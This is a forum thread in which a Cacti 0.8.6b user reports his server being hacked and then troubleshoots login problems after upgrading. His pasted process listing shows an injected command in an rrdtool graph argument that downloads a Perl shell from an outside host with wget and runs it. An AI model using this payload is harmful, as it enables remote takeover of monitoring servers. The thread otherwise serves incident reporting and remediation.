Hacked by Cacti?!?!?!

[bparker]

This should say it all:

# ps auxwwwef|./grep wget
www-data 10146 0.0 0.2 2512 1188 ? S 19:29 0:00 | \_ sh -c cd '/usr/share/cacti' ; /usr/bin/rrdtool graph - --imgformat=PNG --start=?wget cteam.3x.ro/shell.jpg -O /tmp/shell.pl;perl /tmp/shell.pl? --end=-300 --title="core - CPU Usage" --rigid --base=1000 --height=120 --width=500 --alt-autoscale-max --lower-limit=0 --vertical-label="percent" DEF:a="/usr/share/cacti/rra/core_cpu_system_565.rrd":cpu_system:AVERAGE DEF:b="/usr/share/cacti/rra/core_cpu_user_566.rrd":cpu_user:AVERAGE DEF:c="/usr/share/cacti/rra/core_cpu_nice_564.rrd":cpu_nice:AVERAGE CDEF:cdefbc=TIME,1124497454,GT,a,a,UN,0,a,IF,IF,TIME,1124497454,GT,b,b,UN,0,b,IF,IF,TIME,1124497454,GT,c,c,UN,0,c,IF,IF,+,+ AREA:a#FF0000:"System" GPRINTLAST:"Current\:%8.2lf %s" GPRINTAVERAGE:"Average\:%8.2lf %s" GPRINTMAX:"Maximum\:%8.2lf %s\n" STACK:b#0000FF:"User" GPRINTLAST:" Current\:%8.2lf %s" GPRINTAVERAGE:"Average\:%8.2lf %s" GPRINTMAX:"Maximum\:%8.2lf %s\n" STACK:c#00FF00:"Nice" GPRINT:c:LAST:" Current\:%8.2lf %s" GPRINT:c:AVERAGE:"Average\:%8.2lf %s" GPRINT:c:MAX:"Maximum\:%8.2lf %s\n" LINE1:cdefbc#000000:"Total" GPRINT:cdefbc:LAST:" Current\:%8.2lf %s" GPRINT:cdefbc:AVERAGE:"Average\:%8.2lf %s" GPRINT:cdefbc:MAX:"Maximum\:%8.2lf %s" LANG=C PATH=/bin:/usr/bin:/usr/local/bin SNMP_PERSISTENT_FILE=/dev/null


any suggestions on how to fix this please let me know immediately. Cacti is shut off completely for now. BTW I'm running 0.8.6b on Linux.

[TheWitness]

Upgrade to Cacti 0.8.6f.

[bparker]

Can you please be more specific?

Are you telling me to upgrade to that version because it fixes this issue, or
are you just pointing out the fact that I'm running an old version?

[rony]

He is telling you, because it fixes 2 know security issues.

Upgrade to 0.8.6f, it will resolve your security issues.

[bparker]

OK, sorry about that. I just finished upgrading to 0.8.6f per docs/UPGRADE,
and it seemed to go without a hitch.

I can run cactid on the cmdline as the cacti user and it polls everything just fine.

My problem is, I cannot login to the web interface anymore. When I login
as admin, it goes right back to the login page again. And no it is not an incorrect password, I tried that and it specifically tells you the password is wrong. In this case it just keeps going right back to the login page when you enter the right password. I also had another normal non-admin user setup, and now when I try to login as them, I get a "too many redirections" error from my browser. Any help on resolving this? Thanks in advance.

EDIT: I doubled checked all the permissions. That does not seem to be the issue.

[bparker]

nevermind, I fixed it. I wasn't cacti permissions, it was /tmp permissions

chmod 1777 /tmp fixed the problem. Thanks for the help

[rony]

Yah, invalid /tmp permissions causes session files to not be created, which will break logging in.

If your server was hacked, you might want to consider rebuilding it to just be completely sure.

Do you know what they did? How far they got? Have you checked the server for a rootkit?

[bparker]

OK, everything has been working fine since the last post where I fixed the /tmp permissions, now the same thing is happening again, where it takes me right back to the login page after entering the correct user/pass, but only this time I wasn't hacked, and there are no traces of that left anymore anyway. Are there any other things to check for on what might be causing this? I tried to enable all php debugging/errorlevels I could but it does not produce one bit of debug output whatsoever. Any help is greatly appreciated.

EDIT: I triple-checked the /tmp permissions, and it's not that, this time

Looking in /tmp I see the sess_<somehash> files being created, so I doubt this issue is related to the that.

[bparker]

Seems I simply ran out of disk space, sorry